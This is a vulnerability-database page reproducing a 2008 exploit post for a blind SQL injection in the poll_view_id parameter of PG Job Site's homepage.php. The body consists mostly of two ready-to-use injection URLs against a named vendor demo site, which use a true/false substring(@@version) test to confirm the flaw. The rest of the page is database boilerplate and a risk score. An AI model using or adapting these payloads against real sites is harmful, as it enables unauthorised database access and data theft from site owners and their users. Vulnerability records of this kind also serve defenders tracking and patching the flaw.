Lucene search

PG Job Site (poll_view_id) Blind SQL Injection Vulnerability

🗓️ 23 Nov 2008 00:00:00Reported by ZoRLuType

zdt🔗 0day.today👁 13 Views

PG Job Site SQL Injection Vulnerabilit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

============================================================
PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
============================================================


[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: [email protected]
[~]
[~] Date: 23.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
[~] -----------------------------------------------------------

exploit for demo: ( you must login to site after you test this links. you look left for two link)

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )

[~]----------------------------------------------------------------------



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

23 Nov 2008 00:00Current

7.1High risk

Vulners AI Score7.1